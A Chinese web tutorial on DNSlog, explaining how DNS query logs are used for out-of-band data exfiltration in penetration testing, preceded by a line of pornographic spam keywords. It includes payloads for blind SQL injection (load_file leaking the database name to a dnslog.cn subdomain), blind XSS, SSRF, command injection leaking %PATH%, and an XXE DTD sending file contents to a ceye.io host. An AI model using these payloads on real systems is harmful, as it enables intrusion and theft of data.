欧美bbbwbbbw肥妇,免费乱码人妻系列日韩,一级黄片

深入理解DNSlog

 更新時間:2023年05月19日 14:45:26   作者:告白熱  
本文主要介紹了深入理解DNSlog,文中通過示例代碼介紹的非常詳細(xì),對大家的學(xué)習(xí)或者工作具有一定的參考學(xué)習(xí)價值,需要的朋友們下面隨著小編來一起學(xué)習(xí)學(xué)習(xí)吧

0x00 DNSlog 介紹

首先我們知道DNS是起ip與域名的解析的服務(wù),通過ip可以解析到對應(yīng)的域名。DNSlog就是儲存在DNS上的域名相關(guān)的信息,它記錄著你對域名或者IP的訪問信息,也就是類似于日志文件,

0x01 DNSlog回顯原理

首先了解一下多級域名的概念,我們知道因特網(wǎng)采用樹狀結(jié)構(gòu)命名方法,按組織結(jié)構(gòu)劃分域是一個名字空間中一個被管理的劃分,域可劃分為子域,子域再可被劃分為多級域名稱為一級域名,二級域名,三級域名,從一個域名地址來從右到左依次是頂級域名,二級域名,三級域名,例如 gaobai.kxsy.com,
通俗的說就是我有個域名kxsy.work,我將域名設(shè)置對應(yīng)的ip 2.2.2.2 上,這樣當(dāng)我向dns服務(wù)器發(fā)起kxsy.work的解析請求時,DNSlog中會記錄下他給kxsy.work解析,解析值為2.2.2.2,而我們這個解析的記錄的值就是我們要利用的地方,這個過程被記錄下來就是DNSlog,

0x02 DNSlog 應(yīng)用

1.sql布爾盲注、時間盲注,注入的效率低且線程高容易被waf攔截,又或者是目標(biāo)站點沒有回顯可利用NDSlog
2.無回顯的命令執(zhí)行
推薦三個大眾化的免費dns解析記錄網(wǎng)站

http://www.dnslog.cn
http://admin.dnslog.link
http://ceye.io

0x03 DNSlog回顯注入條件

1.數(shù)據(jù)庫root權(quán)限,
2.數(shù)據(jù)庫可讀寫權(quán)限,secure_file_priv值為空,上期筆記有說明,
3.windows系統(tǒng),

0x04 DNSlog -sql注入

1.注冊一個dns解析服務(wù),利用唯一標(biāo)識符,以無回顯sql注入為例

利用標(biāo)識符

2.注入測試 需要閉合語句 替換標(biāo)識符 利用盲注回顯

?id=1' and if((select load_file(concat('\\\\',(select database()),'.tlyypi.dnslog.cn\\abc'))),1,0)--+

記錄到靶場數(shù)據(jù)庫信息

在回顯數(shù)據(jù)時,域名能夠接受的字符是有條件限制的,某些不適合作為域名的特殊字符可能會被屏蔽掉,針對這種情況我們也可以base64編碼后再進行請求。

0x05 DNSlog 其他應(yīng)用

1.xss盲打

"<script src=http://XSS.XXXXX.ceye.io></script>"

2.SSRF

"... <!ENTITY test SYSTEM "SSRF.xxxx.ceye.io\\aa"> ..."

3.命令執(zhí)行

" ping %PATH%.pxxx.ceye.io ..."

4.XXE

XXE漏洞可以解析外部實體,就可以拿來讀取本地服務(wù)器文件,這時,我們只需把dtd文件改成這樣

<!ENTITY % all
"<!ENTITY &#x25; send SYSTEM 'http://XXXX.ceye.io/%file;'>"
>
%all;

到此這篇關(guān)于深入理解DNSlog 的文章就介紹到這了,更多相關(guān)DNSlog內(nèi)容請搜索腳本之家以前的文章或繼續(xù)瀏覽下面的相關(guān)文章希望大家以后多多支持腳本之家!

相關(guān)文章

  • DNS服務(wù)器未響應(yīng)的原因及解決方法

    DNS服務(wù)器未響應(yīng)的原因及解決方法

    DNS是進行域名和與之相對應(yīng)的IP地址轉(zhuǎn)換的服務(wù)器,本文主要介紹了DNS服務(wù)器未響應(yīng)的原因及解決方法,具有一定的參考價值,感興趣的可以了解一下
    2023-10-10
  • DNS信息查詢工具dig用法詳解

    DNS信息查詢工具dig用法詳解

    這篇文章主要為大家介紹了DNS信息查詢工具dig用法詳解,有需要的朋友可以借鑒參考下,希望能夠有所幫助,祝大家多多進步,早日升職加薪
    2023-08-08
  • RHE5服務(wù)器管理 搭建DNS服務(wù)器步驟說明[圖文]

    RHE5服務(wù)器管理 搭建DNS服務(wù)器步驟說明[圖文]

    本文介紹 RHE5中搭建DNS服務(wù)器的方法,供大家學(xué)習(xí)參考
    2013-03-03
  • Windows?Server?2019?安裝架設(shè)DNS服務(wù)器

    Windows?Server?2019?安裝架設(shè)DNS服務(wù)器

    這篇文章主要介紹了Windows?Server?2019?DNS服務(wù)器的配置與管理之安裝DNS服務(wù),需要的朋友可以參考下
    2023-05-05
  • 深入理解DNSlog

    深入理解DNSlog

    本文主要介紹了深入理解DNSlog,文中通過示例代碼介紹的非常詳細(xì),對大家的學(xué)習(xí)或者工作具有一定的參考學(xué)習(xí)價值,需要的朋友們下面隨著小編來一起學(xué)習(xí)學(xué)習(xí)吧
    2023-05-05
  • win2003 DNS服務(wù)器配置方法[圖文詳解]

    win2003 DNS服務(wù)器配置方法[圖文詳解]

    目前很多企業(yè)事業(yè)單位都建立了單位內(nèi)部的局域網(wǎng),網(wǎng)絡(luò)內(nèi)部都配備相關(guān)的服務(wù)器(如web、ftp等服務(wù)器)。內(nèi)部網(wǎng)絡(luò)的用戶都希望所有的服務(wù)器都用域名來訪問,網(wǎng)絡(luò)管理員可以采用在內(nèi)部搭建DNS服務(wù)器的方式來實現(xiàn)
    2012-10-10
  • Windows?Server?2019?DNS服務(wù)器的配置與管理之DNS反向解析

    Windows?Server?2019?DNS服務(wù)器的配置與管理之DNS反向解析

    這篇文章主要介紹了Windows?Server?2019?DNS服務(wù)器的配置與管理之DNS反向解析,需要的朋友可以參考下
    2023-05-05
  • DNS服務(wù)器中創(chuàng)建正向查找區(qū)域并在該區(qū)域下創(chuàng)建主機記錄

    DNS服務(wù)器中創(chuàng)建正向查找區(qū)域并在該區(qū)域下創(chuàng)建主機記錄

    創(chuàng)建正向查找區(qū)域ynkm.com,并在該區(qū)域下創(chuàng)建主機記錄Webserver,ynkm.com,具體操作步驟如下,需要的朋友可以了解下
    2013-12-12
  • 非常好用的DNS服務(wù)器(推薦)

    非常好用的DNS服務(wù)器(推薦)

    本文主要介紹了非常好用的DNS服務(wù)器,這些 DNS 服務(wù)器都可以免費使用,不同地區(qū)的 DNS 解析速度可能會有所不同,建議選擇距離自己較近的 DNS 服務(wù)器以獲得更好的解析速度,下面就一起來了解一下
    2023-10-10
  • DNS原理及其解析過程剖析(圖文)

    DNS原理及其解析過程剖析(圖文)

    我們無法記住10個以上IP地址的網(wǎng)站,所以我們訪問網(wǎng)站時,更多的是在瀏覽器地址欄中輸入域名,就能看到所需要的頁面,這是因為有一個叫DNS服務(wù)器的計算機自動把我們的域名翻譯成了相應(yīng)的IP地址,然后調(diào)出IP地址所對應(yīng)的網(wǎng)頁
    2012-09-09

最新評論